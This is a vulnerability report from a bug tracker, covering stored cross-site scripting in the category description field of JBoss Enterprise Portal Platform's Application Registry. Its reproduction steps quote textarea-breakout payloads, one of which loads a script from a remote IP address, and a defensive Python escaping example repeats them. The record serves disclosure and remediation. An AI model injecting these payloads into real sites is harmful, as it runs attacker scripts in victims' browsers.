Bug 793926 (JBEPP-997)

Summary: XSS issue in category description
Product: [JBoss] JBoss Enterprise Portal Platform 5
Reporter: Thomas Heute <theute>
Component: unspecified
Assignee: Thomas Heute <theute>
Status: CLOSED NEXTRELEASE
Severity: high
Priority: high
Version: 5.1.1.GA
CC: bmachado, epp-bugs, smumford, theute
Target Milestone: ---
Target Release: 5.1.1.DEV03, 5.2.0.DEV02
Hardware: Unspecified
OS: Unspecified
URL: http://jira.jboss.org/jira/browse/JBEPP-997
Doc Type: Bug Fix
Type: Bug
Last Closed: 2011-08-11 09:02:29 UTC

Description Thomas Heute 2011-07-08 08:35:00 UTC
Help Desk Ticket Reference: https://c.na7.visual.force.com/apex/Case_View?id=500A0000007CtcY&sfdc.override=1
project_key: JBEPP

Our application security center of excellence discovered a cross-site scripting vulnerability with the application registry portlet. Here are the steps to reproduce:

Steps to Reproduce Exploit:
1. Log in to the application as "Administrators" user role.
2. Click on "Edit Category" button.
3. Type at the "Description" field the following: Dashboard</textarea><script src=\\3.211.64.16\xsrf\a.js></script>.
4. Press on "Save" button.
5. Then click on "Edit Category" button.
6. Finally, the script is executed as proof of the vulnerability.

Comment 1 Thomas Heute 2011-07-08 08:51:08 UTC
Link: Added: This issue is related to GTNPORTAL-1955


Comment 2 Thomas Heute 2011-07-08 09:46:34 UTC
Help Desk Ticket Reference: Added: https://c.na7.visual.force.com/apex/Case_View?id=500A0000007CtcY&sfdc.override=1


Comment 3 Bruno Machado 2011-07-08 14:59:14 UTC
Pretty much the same steps in the description of this Jira. I could also reproduce using <script>alert("some string") as shown in step 4.

1. login as root
2. Group -> Administration -> Application Registry
3. Edit Category
4. Type at the "Description" field the following:

Dashboard</textarea><script src=\\3.211.64.16\xsrf\a.js>

or

Dashboard</textarea><script>alert("Bad XSS");</script>

5. Click on Save button.
6. Then click on "Edit Category" button.
7. Finally, the script is executed as proof of the vulnerability.
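
The description and comment 3 both show the stored category description being written back verbatim inside the Edit Category textarea, so a "</textarea>" in the value ends the element early and the rest is parsed as markup. The following Python is an added example, not code from this bug report or from the portal itself: it contrasts that rendering with an HTML-escaped one and adds an audit for already-stored values that would break out; the field name, the template strings and the sample descriptions are constructed (the two payloads are the ones quoted above).

```python
import html
import re

# Constructed sample of stored category descriptions: the two payloads quoted
# in this bug report plus one benign value containing characters that must
# survive escaping intact.
STORED_DESCRIPTIONS = {
    "dashboard": r'Dashboard</textarea><script src=\\3.211.64.16\xsrf\a.js></script>',
    "gadgets": 'Dashboard</textarea><script>alert("Bad XSS");</script>',
    "office": 'Office & productivity tools <v2>',
}

TEXTAREA_OPEN = '<textarea name="description">'   # assumed template fragment
TEXTAREA_CLOSE = "</textarea>"

def render_textarea_unsafe(description):
    # Vulnerable form of the Edit Category field: the stored value is copied
    # verbatim, so a "</textarea>" inside it closes the element early and
    # everything after it is parsed as ordinary markup (including <script>).
    return TEXTAREA_OPEN + description + TEXTAREA_CLOSE

def render_textarea_safe(description):
    # Hardened form: HTML-escape for the element-content context. "<" becomes
    # "&lt;", so the value can no longer produce a tag boundary, while the
    # browser still displays the original text to the editor.
    return TEXTAREA_OPEN + html.escape(description, quote=True) + TEXTAREA_CLOSE

_CLOSE_TAG = re.compile(r"</\s*textarea", re.IGNORECASE)

def breaks_out(rendered):
    """True when the rendered form contains any closing-textarea tag beyond the
    single one the template itself emits."""
    return len(_CLOSE_TAG.findall(rendered)) != 1

def displayed_value(rendered):
    """Recover the text a browser would show inside the textarea, to confirm
    that escaping does not alter legitimate descriptions."""
    body = rendered[len(TEXTAREA_OPEN):rendered.rindex(TEXTAREA_CLOSE)]
    return html.unescape(body)

def audit_stored_descriptions(descriptions):
    """Names of stored descriptions that would break out of the textarea if an
    unpatched page rendered them verbatim (e.g. values saved before the fix
    shipped), sorted by name."""
    return sorted(name for name, value in descriptions.items()
                  if breaks_out(render_textarea_unsafe(value)))
```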

Comment 4 Thomas Heute 2011-07-10 19:23:02 UTC
I don't understand, are you saying that the patch doesn't work?

Comment 5 Scott Mumford 2011-07-11 01:36:34 UTC
Release Notes Docs Status: Added: Not Required
Release Notes Text: Added: Included in the Release Note for JBEPP-598


Comment 6 Bruno Machado 2011-07-11 21:12:02 UTC
I hadn't seen that the case status was Resolved while I was writing my comment; you can probably ignore it. I haven't tested with 5.1.1.DEV03 yet, I was just saying that the error was happening with the strings "Dashboard</textarea><script src=" and "Dashboard</textarea><script>".

Thanks.

Comment 7 hfnukal@redhat.com 2011-08-02 05:46:47 UTC
Link: Added: This issue is related to JBEPP-1023


Comment 8 hfnukal@redhat.com 2011-08-02 05:47:45 UTC
Link: Added: This issue is related to JBEPP-365


Comment 9 Michal Vanco 2011-08-10 11:54:21 UTC
Re-opening the issue, still present in 5.1.1 GA.

Comment 10 Michal Vanco 2011-08-17 14:58:34 UTC
Link: Added: This issue relates to JBEPP-1079


Comment 11 hfnukal@redhat.com 2011-08-31 15:40:34 UTC
Link: Added: This issue is related to GTNPORTAL-2073


Comment 12 hfnukal@redhat.com 2011-09-07 16:19:03 UTC
Security: Removed: RHT+eXo Added: Public